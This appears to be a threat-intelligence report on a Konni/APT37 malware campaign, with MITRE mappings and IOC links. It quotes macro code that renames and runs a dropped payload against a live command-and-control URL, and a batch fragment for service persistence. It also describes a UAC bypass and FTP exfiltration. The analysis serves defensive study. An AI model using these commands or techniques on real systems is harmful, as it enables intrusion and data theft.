<h6>The initial vector is an maldoc with a macro. This launches an auto-open method for decrypt the next stager, save it and execute it in push as argument the URL to contact. This saves the modification on the document for avoiding to be executing a second time by the victim.</h6>
cLine = "cmd /c cd /d %USERPROFILE% && ren up.txt up.exe && up http://mydownload-202001.c1.biz"
n = Shell(cLine, vbHide)
End If
End Sub
<h6>The called method parsed the data and xor by a common value used by North Korean ATP (0XFF). This saves the result on a file on the user profile executing the payload.</h6>
<h6>The second stager executed is a PE (dll file) which is packed with UPX too. This checks the presence of the debugger and the architecture for download, the corresponding dat file.</h6>
<h6>The algorithm is a custom base64 with a key, this performs a loop which finds the corresponding reference of the index of the reference string (key). Once the done, this return a value and executed again for all the bytes of the payload are decrypted. Once this done, this writes the cab file on temp directory.</h6>
<h6>After this, the program bypass UAC is using a well-known method with access token impersonation routine in duplicates the token from one of the high integrity instances of Windows Update Standalone Installer (wusa.exe). This fileless UAC bypass is named “Cavalry” and comes from the leaks of "Vault7". This spawns a new cmd process for elevate their rights.</h6>
<h6>The elevated prompt expands the cab file and launches the bat file. This stop this own service if already installed and running on the system. Check if the files exist on the system32 folder (already copied) for copy it. Once this, create a service for the persistence and elevate again theirs rights. Finally delete the loader and the files extracted on the temp folder as anti-forensic measures.</h6>
@echo off
sc stop WPrint > nul
echo %~dp0 | findstr /i "system32" > nul
if %ERRORLEVEL% equ 0 (goto INSTALL) else (goto COPYFILE)
<h6>We can note that the same algorithm (custom base 64) for decrypt the data is used but with different parameters and key. An another detail, the function with is used for getting the first occurrence is replaced by a Native function from the Windows Shell for the same structure of the algorithm base 64.</h6>
<h6>After sleep the process as anti-sandbox measure, this uses the URL for download the last file (4.dat) which contents, the credentials for sending to the FTP. Finally, the implant sends the system informations, list of files by FTP encoded with the custom base64 algorithm.</h6>
<h6>On the TTPs, we can note the differences compared to the TTPs observed at the end of 2019, the main differences are in bitwise operations in custom base 64 and the use of an XOR (0xFF) instead of certutil for decode the base 64 payload.In using this XOR method with this value would leave it possible that Lazarus shared one of their tools for macro editing, some parts of the code matched with parts of code used from the campagne the last year. Here, we can see TTPs from the Medium article (2019 - cf. Links):</h6>
<center><imgsrc="https://miro.medium.com/max/1400/1*CfSltI6XAjK-X9tb9J2FvQ.png"legend="TTPs from the Medium article (cf. Links)"></img></center>
<h2> Indicators Of Compromise (IOC) <aname="IOC"></a></h2>
<h6> The IOC can be exported in <ahref="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/JSON/IOC-Konni_2020_04-23.json">JSON</a> and <ahref="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/CSV/IOC-Konni_2020_04-23.csv">CSV</a></h6>
|Defense Evasion|Modify Registry</br>Deobfuscate/Decode Files or Information|https://attack.mitre.org/techniques/T1112/</br>https://attack.mitre.org/techniques/T1140/|
|Discovery|System Service Discovery<br>Query Registry|https://attack.mitre.org/techniques/T1007/<br>https://attack.mitre.org/techniques/T1012/|
|Command And Control|Custom Cryptographic Protocol|https://attack.mitre.org/techniques/T1024/|
<h6> This can be exported as JSON format <ahref="https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/North%20Korea/APT/APT37/2020-04-23/JSON/Mitre-Konni_2020_04-23.json">Export in JSON</a></h6>